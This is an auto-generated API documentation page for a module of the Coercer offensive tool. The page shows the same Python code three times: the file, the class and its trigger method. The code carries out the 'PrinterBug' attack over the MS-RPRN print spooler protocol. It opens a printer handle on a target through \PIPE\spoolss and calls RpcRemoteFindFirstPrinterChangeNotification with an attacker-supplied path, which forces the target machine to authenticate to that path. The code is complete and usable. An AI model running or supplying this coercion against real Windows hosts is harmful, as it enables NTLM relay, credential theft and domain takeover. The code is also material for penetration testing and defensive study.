coercer.methods.MS_RPRN.RpcRemoteFindFirstPrinterChangeNotification

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : RpcRemoteFindFirstPrinterChangeNotification.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 15 Sep 2022
 6
 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 8from coercer.network.DCERPCSessionError import DCERPCSessionError
 9from impacket.dcerpc.v5 import rprn
10from impacket.dcerpc.v5.dtypes import NULL
11
12
13class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL):
14    """
15    Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83)
16
17    Method found by:
18     -
19    """
20
21    access = {
22        "ncan_np": [
23            {
24                "namedpipe": r"\PIPE\spoolss",
25                "uuid": "12345678-1234-abcd-ef00-0123456789ab",
26                "version": "1.0"
27            }
28        ]
29    }
30
31    protocol = {
32        "longname": "[MS-RPRN]: Print System Remote Protocol",
33        "shortname": "MS-RPRN"
34    }
35
36    function = {
37        "name": "RpcRemoteFindFirstPrinterChangeNotification",
38        "opnum": 62,
39        "vulnerable_arguments": ["pszLocalMachine"]
40    }
41
42    def trigger(self, dcerpc_session, target):
43        if dcerpc_session is not None:
44            try:
45                resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
46                request = rprn.RpcRemoteFindFirstPrinterChangeNotification()
47                request['hPrinter'] = resp['pHandle']
48                request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
49                # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77
50                request['fdwOptions'] = 0x00000000
51                request['pszLocalMachine'] = self.path
52                request['dwPrinterLocal'] = 0
53                request['cbBuffer'] = NULL
54                request['pBuffer'] = NULL
55                resp = dcerpc_session.request(request)
56                return ""
57            except Exception as err:
58                return err
59        else:
60            print("[!] Error: dce is None, you must call connect() first.")
61            return None
class RpcRemoteFindFirstPrinterChangeNotification(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
14class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL):
15    """
16    Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83)
17
18    Method found by:
19     -
20    """
21
22    access = {
23        "ncan_np": [
24            {
25                "namedpipe": r"\PIPE\spoolss",
26                "uuid": "12345678-1234-abcd-ef00-0123456789ab",
27                "version": "1.0"
28            }
29        ]
30    }
31
32    protocol = {
33        "longname": "[MS-RPRN]: Print System Remote Protocol",
34        "shortname": "MS-RPRN"
35    }
36
37    function = {
38        "name": "RpcRemoteFindFirstPrinterChangeNotification",
39        "opnum": 62,
40        "vulnerable_arguments": ["pszLocalMachine"]
41    }
42
43    def trigger(self, dcerpc_session, target):
44        if dcerpc_session is not None:
45            try:
46                resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
47                request = rprn.RpcRemoteFindFirstPrinterChangeNotification()
48                request['hPrinter'] = resp['pHandle']
49                request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
50                # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77
51                request['fdwOptions'] = 0x00000000
52                request['pszLocalMachine'] = self.path
53                request['dwPrinterLocal'] = 0
54                request['cbBuffer'] = NULL
55                request['pBuffer'] = NULL
56                resp = dcerpc_session.request(request)
57                return ""
58            except Exception as err:
59                return err
60        else:
61            print("[!] Error: dce is None, you must call connect() first.")
62            return None

Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83)

Method found by: -

def trigger(self, dcerpc_session, target):
43    def trigger(self, dcerpc_session, target):
44        if dcerpc_session is not None:
45            try:
46                resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
47                request = rprn.RpcRemoteFindFirstPrinterChangeNotification()
48                request['hPrinter'] = resp['pHandle']
49                request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
50                # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77
51                request['fdwOptions'] = 0x00000000
52                request['pszLocalMachine'] = self.path
53                request['dwPrinterLocal'] = 0
54                request['cbBuffer'] = NULL
55                request['pBuffer'] = NULL
56                resp = dcerpc_session.request(request)
57                return ""
58            except Exception as err:
59                return err
60        else:
61            print("[!] Error: dce is None, you must call connect() first.")
62            return None